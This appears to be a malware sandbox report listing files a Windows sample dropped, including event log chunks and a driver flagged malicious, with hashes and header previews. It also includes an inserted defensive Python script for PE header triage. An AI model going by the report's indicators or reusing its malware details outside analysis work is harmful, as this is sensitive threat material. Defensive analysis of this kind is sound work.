                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.07967961973305
                                                                              Encrypted:false
                                                                              SSDEEP:384:VhIivhiuiMidiyiMi3iEiziXviiqYiMciEiri9iuiLsRi11iWiRmiNiHibifiGiS:VjZvaQKtM9QSp
                                                                              MD5:C0228093C6D68E6BF2A2919C4757E19E
                                                                              SHA1:4C30BEAA7AB56231126956EC83C6B9159B7C7809
                                                                              SHA-256:214406B4B4C04186B2955537F29AC633824792BABF9EE5051B0857CCF9AE2763
                                                                              SHA-512:B0E558BEF4B6A43636B87FDAA598BF8329E15920503ED2460B4D0B251BBB29B9CFAC37D35AC5DB0890A65F80A1F6F6AD85A0613CA36E550E70FE1A4354B2CE9F
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):3.410222928423883
                                                                              Encrypted:false
                                                                              SSDEEP:768:PsaQLRaDa/anaraLafarananaPara3abavajaXavanajavabaDaTa7afanaraTa/:yL
                                                                              MD5:CBFAA76BF37086B0BF8307043E177AED
                                                                              SHA1:A4878DDD62C8701B59BA3994E1440D746B4F192E
                                                                              SHA-256:B2A0C5CA329AD60E490A75637FAE0E04BD0DE64691C69337E10C00715AC33B99
                                                                              SHA-512:32F527369E7D3938421B7CAE09320C387353A24F05542D0A31E8F4D528F226FD309FB9AD5687A93B5E9164B7E876740F3FBA13CF009BC57FEF3F02507CAC29DE
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.3642612685419924
                                                                              Encrypted:false
                                                                              SSDEEP:384:dhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ1qXJNXJLJXJxXJBXJfXJKH5:dQ0yUkNYwD8imLEUzL/HXxS
                                                                              MD5:727E32931085339B0D59890FD3759197
                                                                              SHA1:1281993447169E4AF0F4EEDE4F70524D766189F6
                                                                              SHA-256:66D8CFCF522ABCC5813640D9315FB0FC1497236FEBAE41E1095547E137759BFD
                                                                              SHA-512:24BF05FA33772320686E4BD6BF32512DD7BE460393304178292B93E7440B7D198A603C9EB45CCED0479A651C5D752B8E688A207B05E180793D41581E3AACE2FC
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.339319118040676
                                                                              Encrypted:false
                                                                              SSDEEP:384:mh/mcmtmrmsm1mkmQm6m4mnmdmgmsmnmChmxmomMmqmwmHmLmlm9mGmdmpm3mfmP:mNDcxPuxE9KA
                                                                              MD5:F2254833A2ECFC2BE8343C689060E95C
                                                                              SHA1:4E4CE2B2AE58A6A2EFB7D563F17DCBA59A83D2A7
                                                                              SHA-256:A8B52451086D3042E2353D49E565422A083018D22C89F8447889BA77312DEA65
                                                                              SHA-512:38DB34911D61CA2EFE5767C0344BEFF5D81ECEB09B6F7C1F8BC34F0E6F8DEBBB010471A78AA181D4F43941C91AB5C6DFD1D26970AE766E1E208DA776D4FC5FA5
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.7077930323266531
                                                                              Encrypted:false
                                                                              SSDEEP:384:ohK2nl2U52N2h2Ii2wAx2wI2ff2iW2R12Qc2nT2:op
                                                                              MD5:EFAB9CB2241340892CAF25215B175900
                                                                              SHA1:379AAFFC0E9465FBC553A8CD7587F45D07274D24
                                                                              SHA-256:852B282863F4AD8B40A1CB715C9F3EA8B243472EF1D9E95035408AB586EB49BC
                                                                              SHA-512:2702DFE388394AE71F7D2F012E3003F2D3586A5CC2300605D2FF2B14A3F99E4F7443D37203E9EB37101510406C34B6258063807359C31DEDDFE2177ADCB8CBA7
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk carrying the standard Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event" template with System, Provider, Name, Guid, EventID, Qualifiers and Version fields; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):112672
                                                                              Entropy (8bit):3.6633400459609597
                                                                              Encrypted:false
                                                                              SSDEEP:384:hdRXQRvuRhJhpRuVRNRFBwRkRZR5FRT3RWQGRhRW0RWCRiCuRGRNRJRWCJRkt+Rz:hPJKvaFTLoJKvaFTLfg
                                                                              MD5:EA9713941DCA7897D75D38DBFAEEA8C1
                                                                              SHA1:A8521CA40033E0EF26AFBC0CE8DDC909C1EF797E
                                                                              SHA-256:AFECA0A2C9EB3724A50865330EA1097E9104448F60336DC6C109FAE02B9DD9AD
                                                                              SHA-512:7EF03BD749ED81EDEAEAD00229091C12D9E74EB65399C9C0AEAE82CBA10D98482FF148873AC908BB3C23DAF78DF55CE02C7F4A5BE9DC86AFDA00265F949CBA3B
                                                                              Malicious:false
                                                                              Preview:ElfChnk (binary Windows EVTX event log chunk from the Microsoft-Windows-WMI-Activity/Operational log; readable UTF-16 strings include Microsoft-Windows-WMI-Activity, ProtectionManagement, wmiprvse.exe and the truncated path %ProgramData%\Mic; raw dump not reproduced)
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.269282050125859
                                                                              Encrypted:false
                                                                              SSDEEP:384:Vhghshy2h0hEhDh9vhghp6hXghshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLha8:VbsFpkBSqL8wD
                                                                              MD5:A58CC6DEC3C876BEEC16907FC49E19BA
                                                                              SHA1:C2617D099C46BD902D85BD8FE90FC6F34995BA5A
                                                                              SHA-256:BE9A153D8CFAB9F25D94444C14641599D6F8C868DB9675D3FA330E0C7C0110A6
                                                                              SHA-512:4311D7F2C987CCE1F5EE8F78B867A87BFDE8D5E28C996B2BF1347B41063F38B6CB98BE968A962064C5920B9F355AA537FE5370FB78D52C69F5B81B279C394D5D
                                                                              Malicious:false
                                                                              Preview:ElfChnk.............................................b.......................................................................<...........................................l...=...........................................................................................................................f...............?...........................m...................M...F...........................................a.......................................................................................9...&...........**..@.........................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.2593916356001515
                                                                              Encrypted:false
                                                                              SSDEEP:384:ahOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOV5VqVFlVmV8VVG:ayjbS
                                                                              MD5:14652E4148A13AE019B3CF2CC20B5812
                                                                              SHA1:0D6C33AC1CF9CF3EDB3B4632A0943BC7ED7521FC
                                                                              SHA-256:3946831B472B0248BBBB225A2253A26A693E9155C3FFF0D8CE29897E07573134
                                                                              SHA-512:0306DB2CBFEB878570FF4B4342CD6E89B056D9FE7E41029CE17FD08953749351EB65C8B942D36EB7842F6167219997D876270DC0B5528F4FFC13EB310B8F0324
                                                                              Malicious:false
                                                                              Preview:ElfChnk........."..............."...........`8...9....H4......................................................................4.................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................v...........................................................................&*..........**..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.328278185990426
                                                                              Encrypted:false
                                                                              SSDEEP:384:Kh4BwBxNqObx1rBwBwQtBwBnp+/0JBwBc/wBwBwtBwBwfBwBAsmBwBkBwB2mBwBU:K/NqObx/gs3uWQfcjDsM
                                                                              MD5:55B1F2AB9BC716BAE0B9ACED1620227A
                                                                              SHA1:250594A8BF97340574AE1F4E051AA88A05795001
                                                                              SHA-256:972AF48177FCEE32DFE0881E0E8D7B0F333859D1B678FDCE0895A9A4E9999E93
                                                                              SHA-512:7932CF638871AB0E78E73C0A47F767768F4B37EBB6DDDAC4344F2391E7B2831EB696AA5B03BCA4939583FA759247C67214FECCC8E5FC54656CD2F3032042D17F
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................X....1...f@k.....................................................................i..............................................=...........................................................................................................................f...............?...........................m...................M...F....................#......i...........................................................................................................&...........**..H..............A..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):4.396202402379334
                                                                              Encrypted:false
                                                                              SSDEEP:384:IMh4UEiUEfUE5UE0UEfUEtUEpUEAUELUEvUEcUEJUEBUE3UEHUERUExUEeUEaUEW:voHgSNX8+BoUYUkIO
                                                                              MD5:838CCFDA7EEB847C3F96507592B3480B
                                                                              SHA1:1D1C0CA6AFCCC861AFB6B7D2BD500657CC139AC7
                                                                              SHA-256:2E474ECD1D96758EA0BD52D3C594998DFC30DCB83270638B107B41B81FB51339
                                                                              SHA-512:59156BC3267CABA12BB8F542EF10E409F0E685731E8C916681457C9376B36A84DB13B29F006C049528E1E78D63168B9C4B521088FB08445F208432BBDC0EC749
                                                                              Malicious:false
                                                                              Preview:ElfChnk.....................................0)...*..N..,.....................................................................i..................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............4.............F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):68128
                                                                              Entropy (8bit):4.232360734435093
                                                                              Encrypted:false
                                                                              SSDEEP:384:8FR8FRqtM4c60zCwy/EowMt7uS+owMt9UQwowMtbGowMtkoNCaoQlowMtjnXyoAz:KY20DyPUW398Q4D2W
                                                                              MD5:EA22CE163818CE3BA8D689D88FEDCB00
                                                                              SHA1:5F81F95AB616CFE0B8A68E667D23A4649F9C67FF
                                                                              SHA-256:1D282E289A0FCB7AD1D1794383CD4ECDD392BF2D0EBC2E0217A7283A5A1DF2E5
                                                                              SHA-512:D579AAF6DDF57EC12D17FAE9CB14A8DB90383215AFCD0E6EB7BBA590E7EF2D9978858C817404AC4737E611C6838BDA82BCF27DF47803A10C076F439C93837E16
                                                                              Malicious:false
                                                                              Preview:ElfChnk.................b.......b............... ....v:.............................................................................................s...h...............N...=...................................................N...............................................w.......6......................./...................................]...........).......M...T...:.......................................................................................&.......................................................**.. ...b...........^........0.;M&.......0.;M.j.Y)..G2.zA.......A..5...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....^...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):68440
                                                                              Entropy (8bit):0.4795448049634197
                                                                              Encrypted:false
                                                                              SSDEEP:96:mNVaO8JoQ8SRO2U8w527NVaO8JoQ8SRO2U8w52:wV7C1RCGV7C1RC
                                                                              MD5:A198F199AB4A57021AF846544EDB727D
                                                                              SHA1:85B9BACD0A7AECC007094C2FE2704E63FB89D161
                                                                              SHA-256:A1DBA1EA76262BA6ABEE0EF1D55836625B556C5D4BF8C44F902395E8520D8F06
                                                                              SHA-512:83DBCB5CA0165D5B1292B9D6C1A9C5BC0169120B633F4ECC8590B2ECA8866F24A9C28A09BFCDA3C51BF6238B67D5C0DE6EA0A9F1DA03A71B57CC48B60A2FD546
                                                                              Malicious:false
                                                                              Preview:ElfChnk.........................................X...v.|..................................................................... ...............................................=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..............8...^........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):88720
                                                                              Entropy (8bit):4.494679090281514
                                                                              Encrypted:false
                                                                              SSDEEP:768:ykt1rIgd+gkt1rIgd+CVGg5OwELSTFxCydU5vDXkt1rIgd+MX:fSgd+VSgd+A/1MgSgd+MX
                                                                              MD5:D8BBC036B9CCFBC92B1247DD36815BAC
                                                                              SHA1:3578CC64F16C4F32AAD280EAF9190FE78306511E
                                                                              SHA-256:6594DB9C26D145A889CE4E57BD810F8F0D031832BA114093B36D61EED57B995B
                                                                              SHA-512:1E43C0CAF9133BC2C0806A76F63A74FF3B4336D45E5D30F3811873AC0773CCF87AB502E7ECEB57C99CB280FE33C9803AC08AA51707A711F2B083C4F5534C8FA6
                                                                              Malicious:false
                                                                              Preview:ElfChnk......................................*...+...s.l....................................................................m.u................R...s...h...............z...=...................................................N...............................a....'..........w.......2.......................G...................................Y...........).......M...5...:...................................&....................................................................... ...!'..+...............&...........**..@...............^...........l&..........l...R...`....=.......A..1...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....Z...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):86776
                                                                              Entropy (8bit):3.836153912474342
                                                                              Encrypted:false
                                                                              SSDEEP:1536:tFwdontl3EJ5Xs3g3Fwdontl3EJ5Xs3gpCssVtILMmYirZOZ2c1R0uXbiwO9X:
                                                                              MD5:A96D24D9E3002B91A5C274F24215C5A0
                                                                              SHA1:BE4A0421AF4529A17E8F316478D143F67475D327
                                                                              SHA-256:6B22CFBCAE880A6625E329513B4F59F646958256A96DE41D8A5EB79A94FC892A
                                                                              SHA-512:E4A91A425C0B133AC46E0D4F2E45CF3C7086F5EBC654DBAFB3A1A262523C9411E4A60186157D5E5A8B6EBE1DA915DB392C786F98800EF8F6CDE4A543AC88A630
                                                                              Malicious:false
                                                                              Preview:ElfChnk.................i.......x............M...R..........................................................................0.C............................................=..........................................................................................................................._...............8...........................f...................M...c...........................p...................................&...................................................................................**......i............^........}k..&.......}k.....R.H............A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                              Process:C:\ProgramData\IGaming\driver.exe
                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14544
                                                                              Entropy (8bit):6.2660301556221185
                                                                              Encrypted:false
                                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                              Joe Sandbox View:
                                                                               • Filename: hiwA7Blv7C.exe, Detection: malicious
                                                                               • Filename: 5fr5gthkjdg71.exe, Detection: malicious
                                                                               • Filename: aAcx14Rjtw.exe, Detection: malicious
                                                                               • Filename: SharcHack.exe, Detection: malicious
                                                                               • Filename: 0Ty.png.exe, Detection: malicious
                                                                               • Filename: Qhx6a6VLAH.exe, Detection: malicious
                                                                               • Filename: 88aext0k.exe, Detection: malicious
                                                                               • Filename: gaozw40v.exe, Detection: malicious
                                                                               • Filename: c2.exe, Detection: malicious
                                                                               • Filename: ldr.ps1, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
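Two of the file-type strings in this report carry the security-relevant distinction. The file dropped by driver.exe is a "PE32+ executable (native)": its optional header's Subsystem field is IMAGE_SUBSYSTEM_NATIVE (1), as it is for kernel-mode drivers, and its section table (visible in the preview) includes an INIT section, whereas file.exe itself is a Windows GUI image (Subsystem 2). "Digitally signed:false" is likewise a header-level fact: an Authenticode signature is referenced from the security data directory (index 4), so an empty entry there means there is nothing to verify. The script below is an added example, not part of the Joe Sandbox report or its tooling; it reads those fields from constructed PE32+ header skeletons (build_pe, inspect_pe, demo and the section lists are this example's own, with the GUI skeleton's image base 0x140000000 and entry RVA 0x1140 chosen so that it reproduces the Entrypoint value 0x140001140 reported for file.exe). A non-empty security directory only shows that a signature blob is present; validating it still needs a chain check.

```python
"""Header-level triage of the PE files in this report (the dropped
"PE32+ executable (native)" driver and the "PE32+ executable (GUI)" sample).
Added example; the images below are constructed header skeletons, not the
report's files."""
import struct

SUBSYSTEMS = {1: "NATIVE", 2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32PLUS_MAGIC = 0x20B
SECURITY_DIR = 4   # IMAGE_DIRECTORY_ENTRY_SECURITY: file offset/size of the Authenticode blob


def inspect_pe(buf):
    """Pull the fields that decide 'driver vs. application' and 'signed vs. unsigned'."""
    if buf[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe_off = struct.unpack_from("<I", buf, 0x3C)[0]          # e_lfanew
    if buf[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    (machine, nsections, _, _, _, opt_size,
     characteristics) = struct.unpack_from("<HHIIIHH", buf, pe_off + 4)
    opt = pe_off + 24                                         # optional header start
    if struct.unpack_from("<H", buf, opt)[0] != PE32PLUS_MAGIC:
        raise ValueError("only PE32+ (0x20b) is handled here")
    entry_rva = struct.unpack_from("<I", buf, opt + 16)[0]   # AddressOfEntryPoint
    image_base = struct.unpack_from("<Q", buf, opt + 24)[0]  # 8 bytes in PE32+
    subsystem, dll_chars = struct.unpack_from("<HH", buf, opt + 68)
    _, sec_size = struct.unpack_from("<II", buf, opt + 112 + 8 * SECURITY_DIR)
    sections = []
    for i in range(nsections):
        name = struct.unpack_from("<8s", buf, opt + opt_size + 40 * i)[0]
        sections.append(name.rstrip(b"\x00").decode("ascii", "replace"))
    return {
        "machine": machine,
        "file_characteristics": characteristics,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "entrypoint": image_base + entry_rva,                # VA, as the report prints it
        "has_signature_blob": sec_size != 0,                 # presence only, not validity
        "nx_compat": bool(dll_chars & 0x0100),
        "dynamic_base": bool(dll_chars & 0x0040),
        "sections": sections,
        "looks_like_driver": subsystem == 1 and "INIT" in sections,
    }


def build_pe(subsystem, sections, image_base=0x140000000, entry_rva=0x1000, cert_size=0):
    """Constructed PE32+ header skeleton (headers only, no code) for inspect_pe."""
    opt_size = 240
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<Q", opt, 24, image_base)
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)          # section / file alignment
    struct.pack_into("<HH", opt, 68, subsystem, 0x0160)      # HIGH_ENTROPY_VA|DYNAMIC_BASE|NX_COMPAT
    struct.pack_into("<I", opt, 108, 16)                     # NumberOfRvaAndSizes
    if cert_size:
        struct.pack_into("<II", opt, 112 + 8 * SECURITY_DIR, 0x4000, cert_size)
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_AMD64, len(sections),
                       0, 0, 0, opt_size, 0x0022)             # EXECUTABLE_IMAGE|LARGE_ADDRESS_AWARE
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", s.encode(), 0x1000, 0x1000 * (i + 1), 0x200,
                    0x400 + 0x200 * i, 0, 0, 0, 0, 0x60000020)
        for i, s in enumerate(sections))
    pe_off = 0x80
    dos = bytearray(pe_off)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, pe_off)
    return bytes(dos) + b"PE\x00\x00" + coff + bytes(opt) + table


def demo():
    # Section lists mirror the names seen in the driver preview and a plain GUI app.
    driver = build_pe(1, [".text", ".rdata", ".data", ".pdata", "INIT", ".rsrc"])
    app = build_pe(2, [".text", ".rdata", ".data"], entry_rva=0x1140)
    return inspect_pe(driver), inspect_pe(app)
```

Point inspect_pe at the bytes of a dropped file to get the same "native vs. GUI" and "signature blob present" answers the report states, plus the entry-point VA and the DllCharacteristics mitigations; an unsigned native image written under ProgramData is exactly the combination worth escalating.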
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 6.540079343872506
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
